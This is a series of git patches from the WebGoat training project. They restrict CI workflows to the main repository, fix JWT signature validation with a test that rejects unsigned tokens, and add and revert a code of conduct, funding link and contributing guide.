index 7a68efd3c..d30c8c58d 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -46,12 +46,12 @@ jobs:
         run: mvn clean install
 
   notify-slack:
-    if: github.event_name == 'push' && (success() || failure())
+    if: github.repository == 'WebGoat/WebGoat' && github.event_name == 'push' && (success() || failure())
     needs:
       - build
     runs-on: ubuntu-latest
     steps:
-      - name: "Slack workflow notification"
+      - name: "Slack workflow notification fork test"
         uses: Gamesight/slack-workflow-status@master
         with:
           repo_token: ${{secrets.GITHUB_TOKEN}}
diff --git a/.github/workflows/quality_checks.yml b/.github/workflows/quality_checks.yml
new file mode 100644
index 000000000..7e68e6000
--- /dev/null
+++ b/.github/workflows/quality_checks.yml
@@ -0,0 +1,52 @@
+name: "Testing and linting"
+on:
+  push:
+    branches-ignore:
+      - master
+      - develop
+      - release/*
+jobs:
+  install-notest:
+    runs-on: ubuntu-latest
+    name: "Package and linting"
+    steps:
+      - uses: actions/checkout@v2
+      - name: set up JDK 15
+        uses: actions/setup-java@v2
+        with:
+          distribution: 'zulu'
+          java-version: 15
+          architecture: x64
+      - name: Cache Maven packages
+        uses: actions/cache@v2.1.5
+        with:
+          path: ~/.m2
+          key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
+          restore-keys: ubuntu-latest-m2
+      - name: Test with Maven
+        run: mvn clean install -DskipTests
+
+  testing:
+    needs: install-notest
+    runs-on: ubuntu-latest
+    strategy:
+      matrix:
+        args:
+          - mvn -pl '!webgoat-integration-tests' test
+          - mvn -pl webgoat-integration-tests test
+    steps:
+      - uses: actions/checkout@v2
+      - name: set up JDK 15
+        uses: actions/setup-java@v2
+        with:
+          distribution: 'zulu'
+          java-version: 15
+          architecture: x64
+      - name: Cache Maven packages
+        uses: actions/cache@v2.1.5
+        with:
+          path: ~/.m2
+          key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
+          restore-keys: ubuntu-latest-m2
+      - name: Test with Maven
+        run: ${{ matrix.args }}
diff --git a/.github/workflows/rebase.yml b/.github/workflows/rebase.yml
index e1012a97a..5889c17c4 100644
--- a/.github/workflows/rebase.yml
+++ b/.github/workflows/rebase.yml
@@ -5,7 +5,7 @@ on:
 jobs:
   rebase:
     name: Rebase
-    if: github.event.issue.pull_request != '' && contains(github.event.comment.body, '/rebase') && github.event.comment.author_association == 'MEMBER'
+    if: github.repository == 'WebGoat/WebGoat' && github.event.issue.pull_request != '' && contains(github.event.comment.body, '/rebase') && github.event.comment.author_association == 'MEMBER'
     runs-on: ubuntu-latest
     steps:
       - name: Checkout the latest code
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 667b56645..e48bc8500 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -5,6 +5,7 @@ on:
       - v*
 jobs:
   release:
+    if: github.repository == 'WebGoat/WebGoat'
     name: Release WebGoat
     runs-on: ubuntu-latest
     environment:
@@ -103,6 +104,7 @@ jobs:
       - name: "Image digest"
         run: echo ${{ steps.docker_build.outputs.digest }}
   new_version:
+    if: github.repository == 'WebGoat/WebGoat'
     name: Update development version
     needs: [ release ]
     runs-on: ubuntu-latest
diff --git a/.github/workflows/welcome.yml b/.github/workflows/welcome.yml
index 9ad343f08..24c2a27b9 100644
--- a/.github/workflows/welcome.yml
+++ b/.github/workflows/welcome.yml
@@ -7,6 +7,7 @@ on:
 
 jobs:
   greeting:
+    if: github.repository == 'WebGoat/WebGoat'
     runs-on: ubuntu-latest
     steps:
       - uses: actions/first-interaction@v1.1.0
diff --git a/pom.xml b/pom.xml
index 4a337bdda..900d9dbab 100644
--- a/pom.xml
+++ b/pom.xml
@@ -110,11 +110,6 @@
         <url>https://github.com/WebGoat/WebGoat/issues</url>
     </issueManagement>
 
-    <ciManagement>
-        <system>Travis CI</system>
-        <url>https://travis-ci.org/WebGoat/WebGoat</url>
-    </ciManagement>
-
     <properties>
         <!-- Use UTF-8 Encoding -->
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>

From 362248a065c5356abd71c4c164584e93343a8eda Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Wed, 29 Sep 2021 13:36:21 +0200
Subject: [PATCH 009/227] Fix token signature validation

---
 .../org/owasp/webgoat/jwt/JWTSecretKeyEndpoint.java   |  2 +-
 .../owasp/webgoat/jwt/JWTSecretKeyEndpointTest.java   | 11 +++++++++++
 2 files changed, 12 insertions(+), 1 deletion(-)

diff --git a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTSecretKeyEndpoint.java b/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTSecretKeyEndpoint.java
index 8fece23b2..259b9d4aa 100644
--- a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTSecretKeyEndpoint.java
+++ b/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTSecretKeyEndpoint.java
@@ -75,7 +75,7 @@ public class JWTSecretKeyEndpoint extends AssignmentEndpoint {
     @ResponseBody
     public AttackResult login(@RequestParam String token) {
         try {
-            Jwt jwt = Jwts.parser().setSigningKey(JWT_SECRET).parse(token);
+            Jwt jwt = Jwts.parser().setSigningKey(JWT_SECRET).parseClaimsJws(token);
             Claims claims = (Claims) jwt.getBody();
             if (!claims.keySet().containsAll(expectedClaims)) {
                 return failed(this).feedback("jwt-secret-claims-missing").build();
diff --git a/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTSecretKeyEndpointTest.java b/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTSecretKeyEndpointTest.java
index 955dfff18..0ab2e5bc3 100644
--- a/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTSecretKeyEndpointTest.java
+++ b/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTSecretKeyEndpointTest.java
@@ -128,4 +128,15 @@ public class JWTSecretKeyEndpointTest extends LessonTest {
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-invalid-token"))));
     }
+
+    @Test
+    void unsignedToken() throws Exception {
+        Claims claims = createClaims("WebGoat");
+        String token = Jwts.builder().setClaims(claims).compact();
+
+        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/secret")
+                .param("token", token))
+                .andExpect(status().isOk())
+                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-invalid-token"))));
+    }
 }
\ No newline at end of file

From a1796f25773c314c311b967d15e484425dd5f52f Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Wed, 29 Sep 2021 12:02:03 +0200
Subject: [PATCH 010/227] Added funding link

---
 .github/FUNDING.yml | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 .github/FUNDING.yml

diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml
new file mode 100644
index 000000000..696cb3a7f
--- /dev/null
+++ b/.github/FUNDING.yml
@@ -0,0 +1 @@
+custom: https://owasp.org/donate/?reponame=www-project-webgoat&title=OWASP+WebGoat
\ No newline at end of file

From 96ec4aa90907932ac6e17f52d179641a03df4179 Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Wed, 29 Sep 2021 12:40:50 +0200
Subject: [PATCH 011/227] Added code of conduct

---
 CODE_OF_CONDUCT.md | 60 ++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 60 insertions(+)
 create mode 100644 CODE_OF_CONDUCT.md

diff --git a/CODE_OF_CONDUCT.md b/CODE_OF_CONDUCT.md
new file mode 100644
index 000000000..28718f0a4
--- /dev/null
+++ b/CODE_OF_CONDUCT.md
@@ -0,0 +1,60 @@
+# Contributor Covenant Code of Conduct
+
+## Our Pledge
+
+In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, sex characteristics, gender identity and expression, level of experience, education, socio-economic status, nationality, personal appearance, race, religion, or sexual identity and orientation.
+
+## Our Standards
+
+Examples of behavior that contributes to creating a positive environment include:
+
+- Using welcoming and inclusive language
+- Being respectful of differing viewpoints and experiences
+- Gracefully accepting constructive criticism
+- Focusing on what is best for the community
+- Showing empathy towards other community members
+
+Examples of unacceptable behavior by participants include:
+
+- The use of sexualized language or imagery and unwelcome sexual attention or advances
+- Trolling, insulting/derogatory comments, and personal or political attacks
+- Public or private harassment
+- Publishing others' private information, such as a physical or electronic address, without explicit permission
+- Misusing the context of the WebGoat project for commercial goals (e.g. adding sales pitches to the codebase or to communication channels used by the project, such as Slack).
+- Other conduct which could reasonably be considered inappropriate in a professional setting
+
+## Our Responsibilities
+
+Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
+
+Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
+
+## Disclaimer
+
+The WebGoat project and its materials are conceived for educational and research purposes only.
+
+Refrain from violating the laws in your country by carefully consulting them before executing any tests against web applications or other assets utilizing the WebGoat (or Webwolf) materials.
+
+The WebGoat project is also NOT supporting unethical activities in any way. If you come across such requests, please reach out to the project leaders and raise this to them.
+
+Neither OWASP, the WebGoat project leaders, authors or anyone else involved in this project is going to take responsibility for your actions.
+
+The intention of the WebGoat is not to encourage hacking or malicious activities! Instead, the goal of the project is to learn different hacking techniques and offer ways to reduce or mitigate that risk.
+
+## Scope
+
+This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community includes using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
+
+## Enforcement
+
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at nanne.baars@owasp.org.
+
+All complaints will be reviewed and investigated and will result in a response that is deemed necessary and appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
+
+Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
+
+## Attribution
+
+This Code of Conduct is adapted from the [Contributor Covenant](https://www.contributor-covenant.org "Contributor Covenant homepage"), [version 1.4](https://www.contributor-covenant.org/version/1/4/code-of-conduct.html "Code of Conduct version 1.4").
+
+For answers to common questions about this code of conduct, see [the Contributor Covenant FAQ](https://www.contributor-covenant.org/faq)

From 897afa3c2be72cb71a961e80f6c659a28caf44c4 Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Wed, 29 Sep 2021 13:04:29 +0200
Subject: [PATCH 012/227] Start of contributing, adding lock and stale (as per
 example from Juiceshop

---
 .github/lock.yml  | 10 ++++++++++
 .github/stale.yml | 14 ++++++++++++++
 CONTRIBUTING.md   |  0
 3 files changed, 24 insertions(+)
 create mode 100644 .github/lock.yml
 create mode 100644 .github/stale.yml
 create mode 100644 CONTRIBUTING.md

diff --git a/.github/lock.yml b/.github/lock.yml
new file mode 100644
index 000000000..436e0b9a7
--- /dev/null
+++ b/.github/lock.yml
@@ -0,0 +1,10 @@
+---
+daysUntilLock: 365
+skipCreatedBefore: false
+exemptLabels: []
+lockLabel: false
+lockComment: >
+  This thread has been automatically locked because it has not had
+  recent activity after it was closed. :lock: Please open a new issue
+  for regressions or related bugs.
+setLockReason: false
diff --git a/.github/stale.yml b/.github/stale.yml
new file mode 100644
index 000000000..814750195
--- /dev/null
+++ b/.github/stale.yml
@@ -0,0 +1,14 @@
+---
+daysUntilStale: 90
+daysUntilClose: 14
+exemptLabels:
+  - bounty
+  - challenge
+  - critical
+  - feature
+  - technical debt
+staleLabel: stale
+markComment: >
+  This issue has been automatically marked as `stale` because it has not had
+  recent activity. :calendar: It will be _closed automatically_ in one week if no further activity occurs.
+closeComment: false
\ No newline at end of file
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
new file mode 100644
index 000000000..e69de29bb

From ffe400cb76c189eb58cdd000bfc5df1c5ac50ac7 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 29 Sep 2021 14:01:57 +0200
Subject: [PATCH 013/227] Remove accidentally added "test" addition

---
 .github/workflows/build.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index d30c8c58d..5a913a9f7 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -51,7 +51,7 @@ jobs:
       - build
     runs-on: ubuntu-latest
     steps:
-      - name: "Slack workflow notification fork test"
+      - name: "Slack workflow notification"
         uses: Gamesight/slack-workflow-status@master
         with:
           repo_token: ${{secrets.GITHUB_TOKEN}}

From 32bd895632f419c515be9068ad3520eddc30ccf2 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@outlook.com>
Date: Wed, 29 Sep 2021 13:58:49 +0200
Subject: [PATCH 014/227] Revert "Start of contributing, adding lock and stale
 (as per example from Juiceshop"

This reverts commit 897afa3c2be72cb71a961e80f6c659a28caf44c4.
---
 .github/lock.yml  | 10 ----------
 .github/stale.yml | 14 --------------
 CONTRIBUTING.md   |  0
 3 files changed, 24 deletions(-)
 delete mode 100644 .github/lock.yml
 delete mode 100644 .github/stale.yml
 delete mode 100644 CONTRIBUTING.md

diff --git a/.github/lock.yml b/.github/lock.yml
deleted file mode 100644
index 436e0b9a7..000000000
--- a/.github/lock.yml
+++ /dev/null
@@ -1,10 +0,0 @@
----
-daysUntilLock: 365
-skipCreatedBefore: false
-exemptLabels: []
-lockLabel: false
-lockComment: >
-  This thread has been automatically locked because it has not had
-  recent activity after it was closed. :lock: Please open a new issue
-  for regressions or related bugs.
-setLockReason: false
diff --git a/.github/stale.yml b/.github/stale.yml
deleted file mode 100644
index 814750195..000000000
--- a/.github/stale.yml
+++ /dev/null
@@ -1,14 +0,0 @@
----
-daysUntilStale: 90
-daysUntilClose: 14
-exemptLabels:
-  - bounty
-  - challenge
-  - critical
-  - feature
-  - technical debt
-staleLabel: stale
-markComment: >
-  This issue has been automatically marked as `stale` because it has not had
-  recent activity. :calendar: It will be _closed automatically_ in one week if no further activity occurs.
-closeComment: false
\ No newline at end of file
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
deleted file mode 100644
index e69de29bb..000000000

From f5604df2561b6e4efc58cc06c41dbc9ce802f8c5 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@outlook.com>
Date: Wed, 29 Sep 2021 13:58:49 +0200
Subject: [PATCH 015/227] Revert "Added code of conduct"

This reverts commit 96ec4aa90907932ac6e17f52d179641a03df4179.
---
 CODE_OF_CONDUCT.md | 60 ----------------------------------------------
 1 file changed, 60 deletions(-)
 delete mode 100644 CODE_OF_CONDUCT.md

diff --git a/CODE_OF_CONDUCT.md b/CODE_OF_CONDUCT.md
deleted file mode 100644
index 28718f0a4..000000000
--- a/CODE_OF_CONDUCT.md
+++ /dev/null
@@ -1,60 +0,0 @@
-# Contributor Covenant Code of Conduct
-
-## Our Pledge
-
-In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, sex characteristics, gender identity and expression, level of experience, education, socio-economic status, nationality, personal appearance, race, religion, or sexual identity and orientation.
-
-## Our Standards
-
-Examples of behavior that contributes to creating a positive environment include:
-
-- Using welcoming and inclusive language
-- Being respectful of differing viewpoints and experiences
-- Gracefully accepting constructive criticism
-- Focusing on what is best for the community
-- Showing empathy towards other community members
-
-Examples of unacceptable behavior by participants include:
-
-- The use of sexualized language or imagery and unwelcome sexual attention or advances
-- Trolling, insulting/derogatory comments, and personal or political attacks
-- Public or private harassment
-- Publishing others' private information, such as a physical or electronic address, without explicit permission
-- Misusing the context of the WebGoat project for commercial goals (e.g. adding sales pitches to the codebase or to communication channels used by the project, such as Slack).
-- Other conduct which could reasonably be considered inappropriate in a professional setting
-
-## Our Responsibilities
-
-Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
-
-Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
-
-## Disclaimer
-
-The WebGoat project and its materials are conceived for educational and research purposes only.
-
-Refrain from violating the laws in your country by carefully consulting them before executing any tests against web applications or other assets utilizing the WebGoat (or Webwolf) materials.
-
-The WebGoat project is also NOT supporting unethical activities in any way. If you come across such requests, please reach out to the project leaders and raise this to them.
-
-Neither OWASP, the WebGoat project leaders, authors or anyone else involved in this project is going to take responsibility for your actions.
-
-The intention of the WebGoat is not to encourage hacking or malicious activities! Instead, the goal of the project is to learn different hacking techniques and offer ways to reduce or mitigate that risk.
-
-## Scope
-
-This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community includes using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
-
-## Enforcement
-
-Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at nanne.baars@owasp.org.
-
-All complaints will be reviewed and investigated and will result in a response that is deemed necessary and appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
-
-Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
-
-## Attribution
-
-This Code of Conduct is adapted from the [Contributor Covenant](https://www.contributor-covenant.org "Contributor Covenant homepage"), [version 1.4](https://www.contributor-covenant.org/version/1/4/code-of-conduct.html "Code of Conduct version 1.4").
-
-For answers to common questions about this code of conduct, see [the Contributor Covenant FAQ](https://www.contributor-covenant.org/faq)

From 40456f25b9a62161b4dab3cf5d89ed22bd99d5d2 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@outlook.com>
Date: Wed, 29 Sep 2021 13:58:49 +0200
Subject: [PATCH 016/227] Revert "Added funding link"

This reverts commit a1796f25773c314c311b967d15e484425dd5f52f.
---
 .github/FUNDING.yml | 1 -
 1 file changed, 1 deletion(-)
 delete mode 100644 .github/FUNDING.yml

diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml
deleted file mode 100644
index 696cb3a7f..000000000
--- a/.github/FUNDING.yml
+++ /dev/null
@@ -1 +0,0 @@
-custom: https://owasp.org/donate/?reponame=www-project-webgoat&title=OWASP+WebGoat
\ No newline at end of file

From e89a59b0538a3f6128cc1eff0ef12a9d58fb3e51 Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Wed, 29 Sep 2021 12:02:03 +0200
Subject: [PATCH 017/227] Added funding link

---
 .github/FUNDING.yml | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 .github/FUNDING.yml

diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml
new file mode 100644
index 000000000..696cb3a7f
--- /dev/null
+++ b/.github/FUNDING.yml
@@ -0,0 +1 @@
+custom: https://owasp.org/donate/?reponame=www-project-webgoat&title=OWASP+WebGoat
\ No newline at end of file

From 2cb9c52a7a1dcb6f28ece850dc0a4e558c978471 Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Wed, 29 Sep 2021 12:40:50 +0200
Subject: [PATCH 018/227] Added code of conduct

---
 CODE_OF_CONDUCT.md | 60 ++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 60 insertions(+)
 create mode 100644 CODE_OF_CONDUCT.md

diff --git a/CODE_OF_CONDUCT.md b/CODE_OF_CONDUCT.md
new file mode 100644
index 000000000..28718f0a4
--- /dev/null
+++ b/CODE_OF_CONDUCT.md
@@ -0,0 +1,60 @@
+# Contributor Covenant Code of Conduct
+
+## Our Pledge
+
+In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, sex characteristics, gender identity and expression, level of experience, education, socio-economic status, nationality, personal appearance, race, religion, or sexual identity and orientation.
+
+## Our Standards
+
+Examples of behavior that contributes to creating a positive environment include:
+
+- Using welcoming and inclusive language
+- Being respectful of differing viewpoints and experiences
+- Gracefully accepting constructive criticism
+- Focusing on what is best for the community
+- Showing empathy towards other community members
+
+Examples of unacceptable behavior by participants include:
+
+- The use of sexualized language or imagery and unwelcome sexual attention or advances
+- Trolling, insulting/derogatory comments, and personal or political attacks
+- Public or private harassment
+- Publishing others' private information, such as a physical or electronic address, without explicit permission
+- Misusing the context of the WebGoat project for commercial goals (e.g. adding sales pitches to the codebase or to communication channels used by the project, such as Slack).
+- Other conduct which could reasonably be considered inappropriate in a professional setting
+
+## Our Responsibilities
+
+Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
+
+Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
+
+## Disclaimer
+
+The WebGoat project and its materials are conceived for educational and research purposes only.
+
+Refrain from violating the laws in your country by carefully consulting them before executing any tests against web applications or other assets utilizing the WebGoat (or Webwolf) materials.
+
+The WebGoat project is also NOT supporting unethical activities in any way. If you come across such requests, please reach out to the project leaders and raise this to them.
+
+Neither OWASP, the WebGoat project leaders, authors or anyone else involved in this project is going to take responsibility for your actions.
+
+The intention of the WebGoat is not to encourage hacking or malicious activities! Instead, the goal of the project is to learn different hacking techniques and offer ways to reduce or mitigate that risk.
+
+## Scope
+
+This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community includes using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
+
+## Enforcement
+
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at nanne.baars@owasp.org.
+
+All complaints will be reviewed and investigated and will result in a response that is deemed necessary and appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
+
+Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
+
+## Attribution
+
+This Code of Conduct is adapted from the [Contributor Covenant](https://www.contributor-covenant.org "Contributor Covenant homepage"), [version 1.4](https://www.contributor-covenant.org/version/1/4/code-of-conduct.html "Code of Conduct version 1.4").
+
+For answers to common questions about this code of conduct, see [the Contributor Covenant FAQ](https://www.contributor-covenant.org/faq)

From dd89e56f6e14273708c979354b7ffe9e5c985173 Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Wed, 29 Sep 2021 13:04:29 +0200
Subject: [PATCH 019/227] Start of contributing, adding lock and stale (as per
 example from Juiceshop

---
 .github/lock.yml  | 10 ++++++++++
 .github/stale.yml | 14 ++++++++++++++
 CONTRIBUTING.md   |  0
 3 files changed, 24 insertions(+)
 create mode 100644 .github/lock.yml
 create mode 100644 .github/stale.yml
 create mode 100644 CONTRIBUTING.md

diff --git a/.github/lock.yml b/.github/lock.yml
new file mode 100644
index 000000000..436e0b9a7
--- /dev/null
+++ b/.github/lock.yml
@@ -0,0 +1,10 @@
+---
+daysUntilLock: 365
+skipCreatedBefore: false
+exemptLabels: []
+lockLabel: false
+lockComment: >
+  This thread has been automatically locked because it has not had
+  recent activity after it was closed. :lock: Please open a new issue
+  for regressions or related bugs.
+setLockReason: false
diff --git a/.github/stale.yml b/.github/stale.yml
new file mode 100644
index 000000000..814750195
--- /dev/null
+++ b/.github/stale.yml
@@ -0,0 +1,14 @@
+---
+daysUntilStale: 90
+daysUntilClose: 14
+exemptLabels:
+  - bounty
+  - challenge
+  - critical
+  - feature
+  - technical debt
+staleLabel: stale
+markComment: >
+  This issue has been automatically marked as `stale` because it has not had
+  recent activity. :calendar: It will be _closed automatically_ in one week if no further activity occurs.
+closeComment: false
\ No newline at end of file
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
new file mode 100644
index 000000000..e69de29bb

From 75b63ea1793ed0d3e7037fd477e6662ac978dfbe Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Wed, 29 Sep 2021 14:12:58 +0200
Subject: [PATCH 020/227] first version of contributing and PR template

---
 CONTRIBUTING.md          | 126 +++++++++++++++++++++++++++++++++++++++
 PULL_REQUEST_TEMPLATE.md |   7 +++
 README.MD                |   2 +
 3 files changed, 135 insertions(+)
 create mode 100644 PULL_REQUEST_TEMPLATE.md

diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index e69de29bb..528b51dd9 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -0,0 +1,126 @@
+# Contributing
+![GitHub contributors](https://img.shields.io/github/contributors/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/graphs/contributors)
+![GitHub issues by-label "help wanted"](https://img.shields.io/github/issues/bkimminich/juice-shop/help%20wanted.svg)
+![GitHub issues by-label "good first issue"](https://img.shields.io/github/issues/bkimminich/juice-shop/good%20first%20issue.svg)
+
+This document describes how you can contribute to WebGoat. Please read it carefully.
+
+**Table of Contents**
+
+* [How to Contribute to the Project](#how-to-contribute-to-the-project)
+* [How to set up your Contributor Environment](#how-to-set-up-your-contributor-environment)
+* [How to get your PR Accepted](#how-to-get-your-pr-acceted)
+
+## How to Contribute to the project
+
+There are a couple of ways on how you can contribute to the project:
+
+* **File [issues](https://github.com/WebGoat/WebGoat/issues "Webgoat Issues")** for missing content or errors. Explain what you think is missing and give a suggestion as to where it could be added.
+* **Create a [Pull Request (PR)](https://github.com/WebGoat/WebGoat/pulls "Create a pull request")**. This is a direct contribution to the project and may be merged after review. You should ideally [create an issue](https://github.com/OWASP/owasp-mstg/issues "MSTG Issues") for any PR you would like to submit, as we can first review the merit of the PR and avoid any unnecessary work. This is of course not needed for small modifications such as correcting typos.
+* **Help out financially** by donating via [OWASP donations](https://owasp.org/donate/?reponame=www-project-webgoat&title=OWASP+WebGoat).
+
+## How to get your PR Accepted
+
+Your PR is valuable to us. And to make sure we can integrate it smoothly, we have a few items for you to consider. In short:
+The minimum requirements for code contributions are:
+
+1. The code _must_ be compliant with the configured Checkstyle and PMD rules.
+2. All new and changed code _should_ have a corresponding unit and/or integration test.
+3. New and changed lessons _must_ have a corresponding integration test.
+4. [Status checks](https://docs.github.com/en/github/collaborating-with-pull-requests/collaborating-on-repositories-with-code-quality-features/about-status-checks) should pass for your last commit.
+5. All Git commits within a PR _must_ be [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) to indicate the contributor's agreement with the [Developer Certificate of Origin](https://developercertificate.org/).
+
+Additionally, the following guidelines can help:
+
+### Keep your pull requests limited to a single issue
+
+Pull requests should be as small/atomic as possible. Large, wide-sweeping changes in a pull request will be **rejected**, with comments to isolate the specific code in your pull request. Some examples:
+
+* If you are making spelling corrections in the docs, don't modify other files.
+* If you are adding new functions don't '*cleanup*' unrelated functions. That cleanup belongs in another pull request.
+
+#### Squash your commits to a single commit
+
+To keep the history of the project clean, you should make one commit per pull request.
+If you already have multiple commits, you can add the commits together (squash them) with the following commands in Git Bash:
+
+1. Open `Git Bash` (or `Git Shell`)
+2. Enter following command to squash the recent {N} commits: `git reset --soft HEAD~{N} && git commit` (replace `{N}` with the number of commits you want to squash)
+3. Press <kbd>i</kbd> to get into Insert-mode
+4. Enter the commit message of the new commit
+5. After adding the message, press <kbd>ESC</kbd> to get out of the Insert-mode
+6. Write `:wq` and press <kbd>Enter</kbd> to save the new message or write `:q!` to discard your changes
+7. Enter `git push --force` to push the new commit to the remote repository
+
+For example, if you want to squash the last 5 commits, use `git reset --soft HEAD~5 && git commit`
+
+### Don't mix code changes with whitespace cleanup
+
+If you change two lines of code and correct 200 lines of whitespace issues in a file the diff on that pull request is functionally unreadable and will be **rejected**. Whitespace cleanups need to be in their own pull request.
+
+### Keep your code simple!
+
+Please keep your code as clean and straightforward as possible.
+Furthermore, the pixel shortage is over. We want to see:
+
+* `opacity` instead of `o`
+* `placeholder` instead of `ph`
+* `myFunctionThatDoesThings()` instead of `mftdt()`
+
+### Write a good commit message
+
+* Explain why you make the changes. [More infos about a good commit message.][commit_message]
+
+* If you fix an issue with your commit, please close the issue by [adding one of the keywords and the issue number][closing-issues-via-commit-messages] to your commit message.
+
+  For example: `Fix #545`
+
+## How to set up your Contributor Environment
+
+1. Create a GitHub account. Multiple different GitHub subscription plans are available, but you only need a free one. Follow [these steps](https://help.github.com/en/articles/signing-up-for-a-new-github-account "Signing up for a new GitHub account") to set up your account.
+2. Fork the repository. Creating a fork means creating a copy of the repository on your own account, which you can modify without any impact on this repository. GitHub has an [article that describes all the needed steps](https://help.github.com/en/articles/fork-a-repo "Fork a repo").
+3. Clone your own repository to your host computer so that you can make modifications. If you followed the GitHub tutorial from step 2, you have already done this.
+4. Go to the newly cloned directory "WebGoat" and add the remote upstream repository:
+
+    ```bash
+    $ git remote -v
+    origin git@github.com:<your Github handle>/WebGoat.git (fetch)
+    origin git@github.com:<your Github handle>/WebGoat.git (push)
+
+    $ git remote add upstream git@github.com:WebGoat/WebGoat.git
+
+    $ git remote -v
